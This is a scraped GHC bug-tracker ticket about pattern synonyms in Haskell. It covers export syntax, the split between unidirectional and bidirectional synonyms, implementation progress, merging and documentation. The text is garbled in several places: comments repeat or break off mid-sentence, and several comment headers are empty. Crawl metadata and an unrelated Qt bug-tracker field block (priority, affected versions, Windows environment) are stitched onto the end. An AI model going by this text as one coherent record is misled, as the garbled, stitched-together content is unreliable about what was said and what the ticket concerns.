module M( pattern P, foo, bar ) where -- The "pattern P" exports data constructor P data T = P | Q foo :: T foo = P bar :: T -> Int bar P = 1 bar Q = 2 module A where import M -- T is not in scope w1 = bar P -- Uses P as an expression w2 = case foo of P -> 1 -- Uses P as a pattern:
module M( T, pattern AbsP, pattern Q ) where data T = P Int | Q pattern AbsP = P
But I really wanted
AbsP to be uni-directional and according to the current spec PatternSynonyms it is "implicitly bidirection
comment:24 follow-up:.
comment:25 follow-up: 27 Changed 4 years ago
Once a syntax for this is decided, this is trivial to add to my current implementation. is the name of the data constructor) without having to define
AbsP? Would that be taking things too far?
comment.
Well in the design here PatternSynonyms,
pattern P exports P for use both in patterns and expressions. By all means suggest alternative designs; that's what this thread is all about.
comment:27 Changed 4 years ago byis the name of the data constructor) without having to define
AbsP? Would that be taking things too far?
That would treat pattern synonyms and data constructors differently, which I am keen to avoid. Under what you propose:
- If P is a data constructor then
pattern Pwould export P uni-directionally (pattern only)
- If P is a (bi-directonal) pattern synonym then
pattern Pwould export P bi-directionally.
I don't like that... a data constructor is precisely a (degenerate) bidirectional pattern.
I suppose you could put the directionality in the export list:
module M( pattern P, -- Uni-directional constructor Q -- Bidirectional ) where pattern P x = [x] pattern Q y = [y,y]
But I don't want to go this way. If you export P you get all of what P is. Otherwise we'll get into exporting it unidirectionally from one module, bidirectionally from another, then importing both of those, and combining the directinoality of those imports. Too complicated.
Maybe
datacon P, or
view P, rather than
pattern P would address Ian's worry?
comment:28 Changed 4 years ago by
Ah, I see, I had expected that something defined with "pattern" (e.g.
pattern Arrow t1 t2 = App "->" [t1, t2]) could only be used as a pattern. I think a different keyword, e.g. "synonym" (or perhaps "view", as Simon suggested) would be better in that case.
comment:29 Changed 4 years ago by
I realize I was wrong on my last comment: let's not even discuss exporting data constructors as pattern-only here, otherwise this ticket will lose focus.
So let's just come up with some syntax to discern unidirectional vs. bidirectional pattern synonym definitions.
comment:30 Changed 4 years ago by
Interestingly, Lennart's initial proposal () already used different notation for pattern-only synonyms:
pattern Conid varid1 ... varidn ~ pat
How about using this syntax?
comment:31 Changed 4 years ago by
comment:32 Changed 4 years ago by
comment:33 Changed 4 years ago by
Based on discussions with SPJ, I've updated the PatternSynonyms proposal and redesigned the implementation to postpone the instantiation of pattern synonyms until the desugarer. See the updated implementation at
Basically, the old implementation was pretty much unsalvageable for patterns mentioning non-Haskell98 data constructors. The new one works nicely with unconstrained and constrained existential types.
On the features front, I've added explicit syntax for unidirectional vs. bidirectional patterns. The tentative syntax is:
pattern Head x -> (x:_) -- pattern-only synonym pattern Single x = [x] -- bidirectional synonym
So now you can rewrite the second one as
pattern Single x -> [x]
and it will not introduce a new virtual constructor to be used in expressions.
comment:34 Changed 4 years ago by
Added PatternSynonyms/Implementation page describing internals of the code
comment:35 Changed 4 years ago by
comment:36 Changed 4 years ago by
comment:37 Changed 4 years ago by
comment:38 Changed 4 years ago by
comment:39 Changed 4 years ago by
I've added separate tickets to the features from the PatternSynonyms page that are not going to be implemented in the initial version (which is now code-complete and just needs some docs and some comments here and there).
comment:40 Changed 4 years ago by
I've added test cases to the
pattern-synonym branch of
comment:41 Changed 4 years ago by
Code is now past initial review and is ready in the
wip/pattern-synonyms branch on the GHC Git repo.
comment:42 Changed 4 years ago by
This is now merged.
comment:43 Changed 4 years ago by
Reminder: we still need documentation and release notes entry.
comment:44 Changed 4 years ago by
What documentation is needed beside the new section in
docs/users_guide/glasgow_exts? Also, can you point me in the direction of the release notes? I'd like to add a note not just mentioning pattern synonyms but also explaining that it is a preview that will need feedback from actual usage and which has more features planned.
comment:45 Changed 4 years ago by
Just a section in
docs/users_guide/glasgow_exts should be enough. Release notes are in
docs/users_guide/7.8.1-notes.xml; Austin added the entry for pattern synonyms, you might expand it.
comment:46 Changed 4 years ago by
OK, will fix
7.8.1-notes.xml. Just to avoid any misunderstandings, I've already added a section to
glasgow_exts.xml.
comment:47 Changed 4 years ago by
Thanks Gergo!
comment:48 Changed 4 years ago by
The source of the confusion over the docs was that I forgot to push my commit that added the section to
glasgow_exts. Now I've pushed a commit that adds both that and cleans up the release notes.
Conor has lobbied for adding these, and I'd like them too. Allowing pattern matching on abstract types would be a killer feature. | https://ghc.haskell.org/trac/ghc/ticket/5144 | CC-MAIN-2017-34 | refinedweb | 3,335 | 61.06 |
Squeezing More Guice from Your Tests with EasyMock
One other thing was pointed out by several reviewers of my first article and I am in total agreement. Instead of TaxRateManager taking a Customer ID, it makes more sense for it to take a Customer instance and return the tax rate based on that instance. This makes the API a little cleaner.
For this, you need to update the TaxRateManager interface, and the fake object implementation of it.
public interface TaxRateManager { public void setTaxRateForCustomer(Customer customer, BigDecimal taxRate); public void setTaxRateForCustomer(Customer customer, double taxRate); public BigDecimal getTaxRateForCustomer(Customer customer); }
And the new Implementation:
@Singleton public class FakeTaxRateManager implements TaxRateManager { .... public void setTaxRateForCustomer(Customer customer, BigDecimal taxRate) { taxRates.put(customer.getCustomerId(), taxRate); } public void setTaxRateForCustomer(Customer customer, double taxRate) { this.setTaxRateForCustomer(customer, new BigDecimal(taxRate)); } public BigDecimal getTaxRateForCustomer(Customer customer) { BigDecimal taxRate = taxRates.get(customer.getCustomerId()); if (taxRate == null) taxRate = new BigDecimal(0); return taxRate; } }
It's pretty minor stuff, but it creates a cleaner API to use the TaxRateManager now. The Invoice getTotalWithTax method now has to pass in the Customer rather than the ID:
public BigDecimal getTotalWithTax() { BigDecimal total = this.getTotal(); BigDecimal taxRate = this.taxRateManager.getTaxRateForCustomer(customer); BigDecimal multiplier = taxRate.divide(new BigDecimal(100)); return total.multiply(multiplier.add(new BigDecimal(1))); }
AssistedInject
Mixing the factory pattern with your dependency injection has solved the style issues you introduced in the first article by using Guice, so you might be asking yourself why Guice doesn't offer something to do this for us because this would seem to be a fairly common situation.
Well, Guice actually might offer it soon. Jesse Wilson and Jerome Mourits, a pair of engineers at Google, have created a Guice add-on called AssistedInject which formalizes the use of the factory pattern described above and makes it more Guicy as well. You can download and use the extension now, and a description of it is available on the Guice Google group. It it also going to be submitted into the core Guice project for future inclusion.
Recap
So, that's pretty much it. You can download the source code in the form of a NetBeans project that has been adapted to use both Guice and the factory pattern. You have corrected many of the style issues introduced in the first article when you added Guice to the application. What you should take away from this is that Dependency Injection, although very useful, is only one tool in the toolbox. It can be mixed with other software development practices and design patterns where appropriate, and where it makes sense. Used correctly, it can make your implementation and architecture more beautiful. If that is not the case, you are probably mis-using Guice and you should look for another, cleaner way of achieving the same thing (like in this case—using Guice to inject into a factory class instead, and then using the factory to create instances with immutable properties).
Testing Both Sides of Your Class
Looking at what you have so far, are you doing a good job of testing your Invoice class? Probably not; one test under ideal conditions is not very exhaustive. You get some points for adding a couple of different items to the Invoice and then asking for the total with tax—forcing it to sum up the cost of the items and apply the tax to that sum, but you are only testing one possible customer so you should probably make another call with a different customer and resulting tax rate, and ensure that the total is correct for that as well.
What about customers that don't exist? Your implementation of the FakeTaxRateManager returns a 0 for the tax rate in this case—in other words, it fails silently. In a production system, this is probably not what you want; throwing an exception is probably a better idea.
Okay, say you add a test for another customer that exists with a different tax rate, and check the total for that is different from the first customer. Then, you add another test for a non-existent customer and expect an exception to be thrown. Are you well covered then?
I would like to also make sure that these Invoice instances don't interfere with each other, so a test to add items to different Invoices with different Customers to make sure there is no effect from adding items in one invoice to the total in the other seems like a good idea too.
All of this sounds very exhaustive—surely you have tested your little class well if we do all of this? At least, that is what you would think if you were only used to looking at the one side of your class, the API calls (or if you like, the input to your class). There is another side though, what this class calls—in particular, the calls it makes to the TaxRateManager.
You can tell that the calls are probably pretty near correct because you are getting back the amounts you are expecting, but suppose Invoice is very inefficient and calls the TaxRateManager ten times instead of one to try and get the answer? In a system that needs to be highly performant, that is unacceptable overhead. You want to make sure that, for a given call to getTotalWithTax, only one lookup call is made, for the correct customer, to the TaxRateManager.
Page 2 of 5
| http://www.developer.com/design/article.php/10925_3688436_2/Squeezing-More-Guice-from-Your-Tests-with-EasyMock.htm | CC-MAIN-2015-18 | refinedweb | 908 | 50.57 |
I can't understand the end of this code (
array = 0;
#include <iostream>
int main()
{
std::cout << "Enter a positive integer: ";
int length;
std::cin >> length;
int *array = new int[length];
std::cout << "I just allocated an array of integers of length " << length << '\n';
array[0] = 5; // set element 0 to value 5
delete[] array; // use array delete to deallocate array
array = 0; // use nullptr instead of 0 in C++11
return 0;
}
After array has been returned to the OS, there is no need to assign it a value of 0, right?
You're right it is not needed because the memory is freed. But think of a case where you may use the pointer in another place in your code (functions, loops, etc.) after you use
delete on it.
The
array variable still holds the address of the old allocation after the
delete statement was called (dangling pointer). If you would access that address you would get undefined bahaviour (UB) because the memory is no longer yours, in most of the cases your program would crash.
To avoid that you do checks like:
if (array != nullptr) { /* access array */ ... }
To make that check possible you set the pointer to
nullptr or
NULL if C++11 is not available. The
nullptr keyword introduces type safety because it acts like a pointer type and should be preferred over
NULL. To define you own
nullptr to use it for pre C++11 compiler look here: How to define our own nullptr in c++98? | https://codedump.io/share/AzAWH26moGb2/1/deleting-dynamically-allocated-variables-setting-pointer-to-0 | CC-MAIN-2018-26 | refinedweb | 252 | 66.17 |
| Submissions
W3C is pleased to receive the Data Extraction Language submission specification from Republica Corp.
The Data Extraction Language is an XML vocabulary for describing a set of rules to transform structured text data to XML. DEL defines markup to extract relevant information from a text file and to construct an XML file.
There are many languages and systems designed to assist in extracting information from text, including Perl (the "e" in the original acronym stood for "extraction") and the wide field of lexical scanners and parser generators (such as lex and yacc). Also related is XSLT, an XML transformation language which can, to a certain extent, parse text files to generate XML output. Although XSLT 1.0 does not define functions to parse text using regular expressions, it allows the definition of extensions to do so. A few implementations make this mechanism available, making XSLT an appropriate standard to compare DEL to. XSLT 2.0 is expected to support regular expressions through XPath 2.0 (see item 3 in the XPath 2.0 requirements).
Not all of DEL's features are covered by XSLT, for example, the possibility of generating CDATA sections, or to control the way the result XML file is output with the "Document Ready" function. On the other hand XSLT provides many useful functions, such as sorting and numbering, that DEL lacks. One particular feature that DEL could have borrowed from XSLT which would have made the language simpler is the way the result tree is built. While XSLT uses namespaces to allow instantiating the result tree directly, DEL went for the more complicated solution of using constructor elements (<map>) as well as a 'cursor' to navigate through the output tree and add new XML constructs.
It is unfortunate that the text of the submission leaves many questions unanswered. Examples are:
Below I will try to provide brief answers to the questions posed in the W3C Team comment.
* Where exactly do 'over' and 'upto' start or end in the input stream? Both 'over' and 'upto' start at the current ('cursor' or 'offset') position in the input stream. 'over' causes the DEL processor to advance in the input stream until a pattern/regexp is fully matched i.e. input stream cursor/offset is set immediately after the last character matched by the pattern/regexp. 'upto' tells the DEL processor to advance the input stream cursor/offset and stop at the first character of the pattern/regexp match. This first character of the match will be included in the search range of next <extract> command(s).
* What is a dataStreamError? dataStreamError marks a status of the DEL processor set (only) by the <extract> command. dataStreamError -status causes the DEL processor to break out (=continue with the next command on the same nesting level) of nearest parent <repeat> loop. If there is no <repeat> command among the parent elements, the entire DEL script will fail with dataStreamError (which means the DEL processor could not find a match for a pattern/regexp given in a <extract> command and thus is unable to continue with the DEL execution). In case the <extract> command that set the dataStreamError status is not directly a child element of <repeat> command, the DEL processor will step through parent elements until it encounters a <repeat> element (to break out of).
* What does the 'text' function compare exactly? In the absence of a data model, one would imagine that it is string values. But having all examples use numbers can be misleading, it could be assumed that "1.0" and "1" compare as equal. Moreover, the content of "value" attributes is not defined. Only the examples show that it can either be a number or a variable name, but that is not written explicitly. We assume the 'text' function refers to the <test> command. The content of Value1 and Value2 attributes depends on the TestType attribute:
In all cases listed above, the Value1 and Value2 attributes can contain a reference to register, in which case the register name gets replaced with the current content of the register.
* What exactly does "re_equal" test? "re_equal" tests if a string (a literal or a register content) completely matches a regexp. It is similar to the <extract> function's exptype "content" in a sense it requires the regexp match to occur immediately at the beginning of the string.
This submission will be referred to the attention of the XSL Working Group, as the use cases and parsing mechanism could serve as a starting point for the definition of regular expression matching in XPath 2.0.
Disclaimer: Placing a Submission on a Working Group agenda does not imply endorsement by either the W3C Team or the participants of the Working Group, nor does it guarantee that the Working Group will agree to take any specific action on a Submission. | http://www.w3.org/Submission/2001/10/Comment | CC-MAIN-2016-44 | refinedweb | 807 | 51.38 |
Expector
This package provides a way to write tests more easily in a fluent manner (with content assists).
Instead of writing
expect(value, and provide a matcher to check the value,
just type
expectThat(value). and let the content assist do its job!
Usage
A simple usage example:
import 'package:expector/expector.dart'; import 'package:test/test.dart'; String? f() => 'hello'; void main() { test('f() returns a 5-length string', () { expectThat(f()).isNotNull ..isNotEmpty ..hasLength(5); }); }
What's the problem with test package ?
The test package allows users to describe
expectations with matchers:
expect(value, matcher). Unfortunatelly there are
a lot of matchers and it's easy to use a matcher that has no meaning regarding
the value tested. In this case, there will be no error at compile time but there
will be a runtime error. For instance:
import 'package:test/test.dart'; String? f() => 'hello'; void main() { test('f() returns a 5-length string', () { expect(f(), isNotNull); expect(f(), isNotEmpty); expect(f(), hasLength(5)); expect(f(), isNaN); // no compile time }); }
Another issue is that there is no content assist to help user. Everything is suitable as matcher and it could be hard to find the good one.
License
Apache 2.0 | https://pub.dev/documentation/expector/latest/ | CC-MAIN-2021-25 | refinedweb | 203 | 58.69 |
Here's a code I'm reading from a tutorial, and I'm trying to make my own program while learning from this. I try to compile this, and I get errors:
#include <stdio.h>
#include <stdlib.h>
struct person {
char name [20];
struct person *next;
};
struct person *new;
struct person *head;
head = NULL;
main()
{
new = (person*)malloc (sizeof(struct person));
new->next = head;
head = new;
}
The errors are:
Error c:\tc\test.c 10: Declaration needs type or storage class
Error c:\tc\test.c 10: Type mismatch in redeclaration of 'head'
Error c:\tc\test.c 13: Undefined symbol 'person' in function main
Error c:\tc\test.c 13: Expression syntax in function main
*** 4 errors in Compile ***
Any advice? This code was written by the book I'm reading. | http://cboard.cprogramming.com/c-programming/23620-oy-my-head-hurts-more-confusion-any-help.html | CC-MAIN-2015-22 | refinedweb | 132 | 75.91 |
When declred in a program they are usually at the top, before any functions are used, depending on your programing practices, and will look like this
#include < stdio.h >
When declred in a program they are usually at the top, before any functions are used, depending on your programing practices, and will look like this
#include < stdio:
114,517+ people in England,
24,577+ people in Germany,
25 people in the United States of America,
That's a total of 173408+ people killed for being a witch (according to the Catholic Church). That's one person a day for 475 years!… | http://everything2.com/node/ticker/New+Writeups+Atom+Feed?foruser=genus_001 | CC-MAIN-2015-48 | refinedweb | 101 | 55.92 |
8.3. Learning to recognize handwritten digits with a K-nearest neighbors class will see how to recognize handwritten digits with a K-nearest neighbors (K-NN) classifier. This classifier is a simple but powerful model, well-adapted to complex, highly nonlinear datasets such as images. We will explain how it works later in this recipe.
How to do it...
1. We import the modules:
import numpy as np import sklearn import sklearn.datasets as ds import sklearn.model_selection as ms import sklearn.neighbors as nb import matplotlib.pyplot as plt %matplotlib inline
2. Let's load the digits dataset, part of the
datasets module of scikit-learn. This dataset contains handwritten digits that have been manually labeled:
digits = ds.load_digits() X = digits.data y = digits.target print((X.min(), X.max())) print(X.shape)
(0.0, 16.0) (1797, 64)
In the matrix
X, each row contains
8*8=64 pixels (in grayscale, values between 0 and 16). The row-major ordering is used.
3. Let's display some of the images along with their labels:
nrows, ncols = 2, 5 fig, axes = plt.subplots(nrows, ncols, figsize=(6, 3)) for i in range(nrows): for j in range(ncols): # Image index k = j + i * ncols ax = axes[i, j] ax.matshow(digits.images[k, ...], cmap=plt.cm.gray) ax.set_axis_off() ax.set_title(digits.target[k])
4. Now, let's fit a K-nearest neighbors classifier on the data:
(X_train, X_test, y_train, y_test) = \ ms.train_test_split(X, y, test_size=.25)
knc = nb.KNeighborsClassifier()
knc.fit(X_train, y_train)
5. Let's evaluate the score of the trained classifier on the test dataset:
knc.score(X_test, y_test)
0.987
6. Now, let's see if our classifier can recognize a handwritten digit:
# Let's draw a 1. one = np.zeros((8, 8)) one[1:-1, 4] = 16 # The image values are in [0, 16]. one[2, 3] = 16
fig, ax = plt.subplots(1, 1, figsize=(2, 2)) ax.imshow(one, interpolation='none', cmap=plt.cm.gray) ax.grid(False) ax.set_axis_off() ax.set_title("One")
# We need to pass a (1, D) array. knc.predict(one.reshape((1, -1)))
array([1])
Good job!
How it works...
This example illustrates how to deal with images in scikit-learn. An image is a 2D \((N, M)\) matrix, which has \(NM\) features. This matrix needs to be flattened when composing the data matrix; each row is a full image.
The idea of K-nearest neighbors is as follows: given a new point in the feature space, find the K closest points from the training set and assign the label of the majority of those points.
The distance is generally the Euclidean distance, but other distances can be used too.
The following image, obtained from the scikit-learn documentation at, shows the space partition obtained with a 15-nearest-neighbors classifier on a toy dataset (with three labels):
The number \(K\) is a hyperparameter of the model. If it is too small, the model will not generalize well (high variance). In particular, it will be highly sensitive to outliers. By contrast, the precision of the model will worsen if \(K\) is too large. At the extreme, if \(K\) is equal to the total number of points, the model will always predict the exact same value disregarding the input (high bias). There are heuristics to choose this hyperparameter.
It should be noted that no model is learned by a K-nearest neighbor algorithm; the classifier just stores all data points and compares any new target points with them. This is an example of instance-based learning. It is in contrast to other classifiers such as the logistic regression model, which explicitly learns a simple mathematical model on the training data.
The K-nearest neighbors method works well on complex classification problems that have irregular decision boundaries. However, it might be computationally intensive with large training datasets because a large number of distances have to be computed for testing. Dedicated tree-based data structures such as K-D trees or ball trees can be used to accelerate the search of nearest neighbors.
The K-nearest neighbors method can be used for classification, like here, and also for regression problems. The model assigns the average of the target value of the nearest neighbors. In both cases, different weighting strategies can be used.
There's more...
Here are a few references:
- The K-NN algorithm in scikit-learn's documentation, available at
- The K-NN algorithm on Wikipedia, available at
- Blog post about how to choose the K hyperparameter, available at
- Instance-based learning on Wikipedia, available at
See also
- Predicting who will survive on the Titanic with logistic regression
- Using support vector machines for classification tasks | https://ipython-books.github.io/83-learning-to-recognize-handwritten-digits-with-a-k-nearest-neighbors-classifier/ | CC-MAIN-2019-09 | refinedweb | 785 | 58.08 |
Writing tests¶
Tests in MicroPython are located at the path
tests/. The following is a listing of
key directories and the run-tests.py runner script:
. ├── basics ├── extmod ├── float ├── micropython ├── run-tests.py ...
There are subfolders maintained to categorize the tests. Add a test by creating a new file in one of the existing folders or in a new folder. It’s also possible to make custom tests outside this tests folder, which would be recommended for a custom port.
For example, add the following code in a file
print.py in the
tests/unix/ subdirectory:
def print_one(): print(1) print_one()
If you run your tests, this test should appear in the test output:
$ cd ports/unix $ make tests skip unix/extra_coverage.py pass unix/ffi_callback.py pass unix/ffi_float.py pass unix/ffi_float2.py pass unix/print.py pass unix/time.py pass unix/time2.py
Tests are run by comparing the output from the test target against the output from CPython. So any test should use print statements to indicate test results.
For tests that can’t be compared to CPython (i.e. micropython-specific functionality),
you can provide a
.py.exp file which will be used as the truth for comparison.
The other way to run tests, which is useful when running on targets other than the Unix port, is:
$ cd tests $ ./run-tests.py
Then to run on a board:
$ ./run-tests.py --target minimal --device /dev/ttyACM0
And to run only a certain set of tests (eg a directory):
$ ./run-tests.py -d basics $ ./run-tests.py float/builtin*.py | https://docs.micropython.org/en/v1.15/develop/writingtests.html | CC-MAIN-2022-05 | refinedweb | 265 | 70.29 |
Having spent a decent amount of time watching both the r and pandas tags on SO, the impression that I get is that
pandas
pandas
import pandas as pd
df = pd.DataFrame({'user': ['Bob', 'Jane', 'Alice'],
'income': [40000, 50000, 42000]})
datetime
expand.grid()
dput()
Note: The ideas here are pretty generic for StackOverflow, indeed questions.
do include small* example DataFrame, either as runnable code:
In [1]: df = pd.DataFrame([[1, 2], [1, 3], [4, 6]], columns=['A', 'B'])
or make it "copy and pasteable" using
pd.read_clipboard(sep='\s\s+'), you can format the text for StackOverflow highlight and use Ctrl+K (or prepend four spaces to each line):
In [2]: df Out[2]: A B 0 1 2 1 1 3 2 4 6)
In [3]: iwantthis Out[3]: A B 0 1 5 1 4 6
Explain what the numbers come from: the 5 is sum of the B column for the rows where A is 1.
do show the code you've tried:
In [4]: df.groupby('A').sum() Out[4]: B A 1 5 4 6
But say what's incorrect: the A column is in the index rather than a column.
do show you've done some research (search the docs, search StackOverflow), give a summary:
The docstring for sum simply states "Compute sum of group values"
The groupby docs don't give any examples for this.
Aside: the answer here is to use
df.groupby('A', as_index=False).sum().
if it's relevant that you have Timestamp columns, e.g. you're resampling or something, then be explicit and apply
pd.to_datetime to them for good measure**.
df['date'] = pd.to_datetime(df['date']) # this column ought to be date..
** Sometimes this is the issue itself: they were strings.
don't include a MultiIndex, which we can't copy and paste (see above), this is kind of a grievance with pandas default display but nonetheless annoying:
In [11]: df Out[11]: C A B 1 2 3 2 6
The correct way is to include an ordinary DataFrame with a
set_index call:
In [12]: df = pd.DataFrame([[1, 2, 3], [1, 2, 6]], columns=['A', 'B', 'C']).set_index(['A', 'B']) In [13]: df Out[13]: C A B 1 2 3 2 6
do provide insight to what it is when giving the outcome you want:
B A 1 1 5).
don't link to a csv we don't has access to (ideally don't link to an external source at all...)
df = pd.read_csv('my_secret_file.csv') # ideally with lots of parsing options. | https://codedump.io/share/43VdzBc9BtM1/1/how-to-make-good-reproducible-pandas-examples | CC-MAIN-2017-39 | refinedweb | 429 | 77.47 |
select_detach()
Detach a file descriptor from a dispatch handle
Synopsis:
#include <sys/iofunc.h> #include <sys/dispatch.h> int select_detach( void *dpp, int fd );
Since:
BlackBerry 10.0.0
Arguments:
- dpp
- The dispatch handle, as returned by a successful call to dispatch_create(), that you want to detach from the file descriptor.
- fd
- The file descriptor that you want to detach.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The function select_detach() detaches the file descriptor fd that was registered with dispatch dpp, using the select_attach() call.
Returns:
- 0
- Success.
- -1
- The file descriptor fd wasn't registered with the dispatch dpp.
Examples:
#include <sys/dispatch.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> int my_func( … ) { … } int main( int argc, char **argv ) { dispatch_t *dpp; int fd; select_attr_t attr; ); … if ( (select_detach( dpp, fd )) == -1 ) { fprintf( stderr, "Failed to detach \ the file descriptor.\n" ); return 1; } }
For examples using the dispatch interface, see dispatch_create(), message_attach(), resmgr_attach(), and thread_pool_create().
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/s/select_detach.html | CC-MAIN-2016-44 | refinedweb | 192 | 53.58 |
In this tutorial, we are going to learn to code the aforementioned grid in C++ To begin with, we need to import ROOT so that we can use the toolkit. We also set our Notebook to C++
from ROOTaaS.iPyROOT import ROOT ROOT.toCpp()
Welcome to ROOTaas Beta
Notebook is in Cpp mode
auto pi = TMath::Pi();
Here we are writing the code for our functions that we will call on later. The "*"s are pointers, that access a certain area of the memory (only in the first set of parentheses of each line, the others are multiplications).
The ".dcl" marks a cell as used for declaration of functions.
.dcl double single(double *x, double *par){return pow(sin(pi*par[0]*x[0])/(pi*par[0]*x[0]),2);}; double nslit0(double *x, double *par){return pow(sin(pi*par[1]*x[0])/sin(pi*x[0]),2);}; double nslit(double *x, double *par){return single(x,par) * nslit0(x,par);};
We set the number of slits to 4, and the ration of slit width to distance between slits to 2.
float r=.2,ns=2;
Here we are using the ROOT Type TF1 to write our function and we add the "*" pointer before our Fnslit object so that the information can be saved to the computer's memory. We set the options for our function with the command SetNpx. Here we use the "->" because we are setting a command to an object with a pointer.
TF1 Fnslit("Fnslit",nslit,-5.001,5.,2); Fnslit.SetNpx(500);
Here you can see that we are setting the parameters for the code, so that we can apply them as fixed variables that we state at the beginning of our code. This saves us the trouble of entering long numbers over and over again. Note that the parameter number starts at 0, not 1.
Fnslit.SetParameters(r,ns);
Now that we've got our code nicely written out, we can use the "Draw" command so that we can see the graph.
Fnslit.Draw();
Info in <TCanvas::MakeDefCanvas>: created default TCanvas with name c1 | https://nbviewer.ipython.org/urls/indico.cern.ch/event/395198/material/1/10.ipynb | CC-MAIN-2021-49 | refinedweb | 351 | 68.3 |
Generics are great but in C# they seem to be limited in what they can do - specifically you can't have an operation that depends on the type actually used. However generic delegates provide a way of implementing type dependent operations in a generic method. This article takes a look at how this works using the Array as an example.
We all know and love arrays but .NET has some data structures and facilities that are just a touch more sophisticated than the simple array. What is often not realised is that the introduction of generics has changed the way that even simple things like arrays can be used. In this article we look at the way generic alternatives to the usual array methods are used. It also provides an interesting example of non-generic v generic approaches to coding simple things.
In particular it provides an example of how we can overcome one of the big problems in using generics - type specific operations. Using generic delegates you can implement a generic algorithm that uses operations which depend on the type specified when the generic is used.
The .NET array was already a fairly sophisticated construct compared to simple languages because it treats everything as an object. This means that arrays not only store data they also can have methods that do things. In most cases however these methods are provided by the static Array object.
For example:
int[] A = new int[50];//put some data into AArray.Sort(A);
results in the array A being sorted into ascending order using a QuickSort.
Thing are a little more sophisticated than the appear because you can see the order relation used in the sort. The point is that you can have an array of strongly typed objects and in this case you need to defined what a sorted order is.
To define the order relation used in the sort you need to implement an object with an IComparer interface. This defines a Compare method that returns –1, 0, or 1 depending on the result of the compare:
private class CMyCompare : IComparer{ int IComparer.Compare(Object x, Object y) {
The problem now is that we have to do the comparison between x and y but this is difficult without knowing what types they are. Without generics this is the only way you can define the interface.
The simplest solution is to cast to the type that you know is stored in the array and then use the type’s CompareTo method:
private class CMyCompare : IComparer{ int IComparer.Compare(Object x, Object y) { return (((int)y).CompareTo((int)x)); }}
Array.Sort(A, new CMyCompare());
The wider point being made is that without using generics this is the only way the job can be done. You need an interface to define the form of the function to be used and you have to cast to actually do the work that makes use of the nature of the objects actually being passed. This clearly isn't type safe at compile time as the casts cannot be checked but it can be made type safe at runtime by adding code to make sure the objects are of a type you can work with.
This is all good but it’s pre-generics which were introduced as long ago as .NET 2.0. Arguably generics provide a better way of implementing sorting methods that work with any type. The big problem with generics is that you can't use them to do things that are type specific. That is if you have two objects that are specified as generic you can't add them together even if in they support the operation. That is you can't write something like:
T x;T y;T z;z=x+y;
because the type of T isn't specified.
This seems to reduce the usefulness of generics. But this isn't always the case because you can define operations on generics using a generic delegate i.e. a method type with a generic signature. The concrete operation is then provided by a specific instance of the delegate that has a fully defined signature that fits the generic specification.
In .NET a number of new generic sort methods were introduced. For example:
public static void Sort<T> ( T[] array, Comparison<T> comparison)
This uses the generic Comparison delegate to supply the order relation used in the sort:
public delegate int Comparison<T> (T x,T y)
To implement the same sort as we did using IComparer all we have to do is write a Comparison function - no interfaces necessary:
public int MyCompare(int x, int y){return (((int)y).CompareTo((int)x));}
Now as long as we select the generic sort i.e. Sort<T> all we have to change is - well nothing much at all:
Array.Sort(A, MyCompare);
Notice this differs slightly from the use of generics we normally encounter. The MyCompare function simply has to have the correct signature and the system uses the type information to instantiate the generic within the Sort method.
This becomes slightly clearer if you write it out fully as:
Array.Sort<int>( A,new Comparison<int>(MyCompare));
which instantiates the Sort definition to:
public static void Sort ( int [] array, Comparison< int > comparison)
To understand what a generic definition actually produces it is often helpful to actually write out the result of setting the type parameters to particular values.
In turn the definition of Comparison is:
public delegate int Comparison (int x,int y)
This is, of course, the signature of the function that we are actually passing. Notice that the shorthand way of writing the function call saves specifying the data type twice and it also automatically creates the delegate using the “method group conversion” facility.
<ASIN:0470495995>
<ASIN:1430229799>
<ASIN:0262201755>
<ASIN:0596800959> | https://i-programmer.info/programming/c/2060-generics-and-arrays.html | CC-MAIN-2021-17 | refinedweb | 973 | 51.28 |
Buttons communicate the action that will occur when the user touches them.
Material buttons trigger an ink reaction on press. They may display text, imagery, or both. Flat buttons and raised buttons are the most commonly used types.
Flat buttons are text-only buttons. They may be used in dialogs, toolbars, or inline. They do not lift, but fill with color on press.
Outlined buttons are text-only buttons with medium emphasis. They behave like flat buttons but have an outline and are typically used for actions that are important, but aren’t the primary action in an app.
Raised buttons are rectangular-shaped buttons. They may be used inline. They lift and display ink reactions on press.
A floating action button represents the primary action in an application. Shaped like a circled icon floating above the UI, it has an ink wash upon focus and lifts upon selection. When pressed, it may contain more related actions.
Only one floating action button is recommended per screen to represent the most common action.
The floating action button animates onto the screen as an expanding piece of material, by default.
A floating action button that spans multiple lateral screens (such as tabbed screens) should briefly disappear, then reappear if its action changes.
The Zoom transition can be used to achieve this. Note that since both the exiting and entering
animations are triggered at the same time, we use
enterDelay to allow the outgoing Floating Action Button's
animation to finish before the new one enters.
Icon buttons are commonly found in app bars and toolbars.
Icons are also appropriate for toggle buttons that allow a single choice to be selected or deselected, such as adding or removing a star to an item.
Sometimes you might want to have icons for certain button to enhance the UX of the application as we recognize logos more easily than plain text. For example, if you have a delete button you can label it with a dustbin icon.
If you have been reading the overrides documentation page but you are not confident jumping in, here's an example of how you can change the main color of a Button.
The Flat Buttons, Raised Buttons, Floating Action Buttons and Icon Buttons are built on top of the same component: the
ButtonBase.
You can take advantage of this lower level component to build custom interactions.
One common use case is to use the button to trigger a navigation to a new page.
The
ButtonBase component provides a property to handle this use case:
component.
Given that a lot of our interactive components rely on
ButtonBase, you should be
able to take advantage of it everywhere:
import { Link } from 'react-router-dom' import Button from '@material-ui/core/Button'; <Button component={Link} Link </Button>
or if you want to avoid properties collisions:
import { Link } from 'react-router-dom' import Button from '@material-ui/core/Button'; const MyLink = props => <Link to="/open-collective" {...props} /> <Button component={MyLink}> Link </Button>
Note: Creating
MyLink is necessary to prevent unexpected unmounting. You can read more about it here. | https://material-ui-next.com/demos/buttons/ | CC-MAIN-2019-04 | refinedweb | 515 | 55.74 |
Details
- Type: Bug
- Status: Closed
- Priority: P1: Critical
- Resolution: Done
- Affects Version/s: 5.6.2, 5.8.0, 5.9, 5.12.0 RC, 5.12.0, 5.12.1
- Fix Version/s: 5.12.2, 5.14.0 Alpha
- Component/s: Core: Animation Framework, Quick: Core Declarative QML
- Labels:
- Environment:Windows 10 1703 64 bit
MSVC2015 32 bit
MSVC2015 64 bit
